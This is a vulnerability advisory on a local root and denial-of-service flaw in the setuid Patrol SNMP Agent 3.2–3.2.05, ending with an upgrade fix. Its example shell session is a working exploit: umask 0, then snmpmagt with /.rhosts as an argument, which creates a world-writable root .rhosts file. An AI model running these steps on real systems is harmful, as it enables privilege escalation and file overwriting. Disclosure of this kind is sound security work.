COMMAND

    Patrol SNMP Agent

SYSTEMS AFFECTED

    Patrol SNMP Agent 3.2...3.2.05

PROBLEM

    Andrew  Alness  found  following  local  root/denial  of  service.
    Example:

        maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al snmpmagt
        -rwsr-xr-x   1 root       users       185461 Mar  6  1998 snmpmagt*

        maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
        /.rhosts not found

        maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> umask 0

    First argument  must be  either an  invalid config  file or a file
    that doesn't exist.

        maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> snmpmagt yoyoyo /.rhosts
        yoyoyo: No such file or directory
        snmp bind failure: Address already in use
        /opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin/snmpmagt: error processing configuration

        maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
        -rw-rw-rw-   1 root       users          770 Jul 13 14:42 .rhosts

    If the file exists it  keeps the same perms, otherwise  creates it
    with perms  based on  your umask  and chown's  to whoever owns the
    parent directory of the file you're creating.  If the file  exists
    it overwrites it with "i^A"  then the result of gethostname()  and
    some whitespace.  This problem  is not platform dependent and  was
    tested based on out of box install on an HP.

SOLUTION

    The  issue  has  been  fixed  as  of  October/November  1998.  The
    solution for  this issue  is to  upgrade to  a release  of the BMC
    PATROL product higher than 3.2.05.  That is, this issue is limited
    to PATROL  Version 3.2  to 3.2.05  only -  all versions 3.2.07 and
    higher, including PATROL Version 3.3.xx, are OK.